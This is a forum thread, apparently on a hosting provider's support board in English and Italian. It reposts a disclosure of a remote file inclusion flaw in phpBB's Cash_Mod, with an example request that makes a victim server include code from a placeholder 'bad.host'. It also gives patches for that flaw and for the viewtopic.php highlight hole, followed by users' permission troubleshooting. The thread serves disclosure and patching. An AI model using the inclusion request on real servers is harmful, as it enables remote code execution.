phpBB Vulnerabilit

[serverplan]

Hi all

phpBB is a very popular message board using modules extensions.

One of these module ? Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side.

Let?s start :

In file /admin/admin_cash.php

?..
if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);
?.

First, nothing seems wrong! It?s just a normal piece of code with ?include? functions, but
$phpbb_root_path & .$phpEx ? are *NOT* define yet!


I don?t know why, but someone decided to define these variables later in the code :

??
//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);

?..

Well, any user can rewrite these parameters with GET or POST requests.

Example :
http://victim.host/phpBB2/admin/admi...tp://bad.host/


Fix :
Set all default parameters after ?if ( !empty($setmodules) )?

Example :

//
// Let's set the root dir for phpBB
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);

if ( !empty($setmodules) )
{
include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
$menu = array();
admin_menu($menu);


Thank you rofl!

[serverplan]

Soluzione:

In the mean time we strongly, and I mean strongly! urge all our users to make the following change to viewtopic.php as a matter of urgency.

Open viewtopic.php in any text editor. Find the following section of code:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

for($i = 0; $i < sizeof($words); $i++)
{


and replace with:
Code:

//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

for($i = 0; $i < sizeof($words); $i++)
{

[mat]

scusate, come mai adesso non funziona pi??
http://www.forum.sowdust.it/viewtopic.php
Io ho cambiato come mi avete scritto per e-mail e come ho trovato qui sul forum.
Poi ho anche scaricato tutto il phpbb e salvato la pagina viewtopic.
Ma niente, sempre lo stesso errore.
Sapete mica darmi una mano?
l'errore specifico ? questo:

Codice:

Warning: Unknown(/home/sowdust/public_html/forum/viewtopic.php): failed to open stream: Permission denied in Unknown on line 0

Warning: (null)(): Failed opening '/home/sowdust/public_html/forum/viewtopic.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in Unknown on line 0

[serverplan]

Salve

effettui un chmod 644 sul file viewtopic.php

[mat]

ah, grazie.
Re-inviandolo si ? risolto il problema.
Solo che non ho un ftp che mi permette di cambiare i CHMOD, ho solo ftp commander e ftp explorer.
Sapreste mica consigliarmene uno free che abbia questa funzione?

[serverplan]

Pu? provare con http://filezilla.sourceforge.net/

grazie

[mat]

grazie mille!

[ssorrentino]

Decisamente sono un p? arruginito come programmatore ma non vedo la differenza tra il codice vecchio ed il nuovo

[serverplan]

Nel nuovo codice manca urldecode

[Delphium]

Il fatto che il file viewtopic.php sia passato da solo dal valore 644 a 000 come attributi ? indice di preoccupazione? Naturalmente, ho aggiornato subito all'ultima versione disponibile.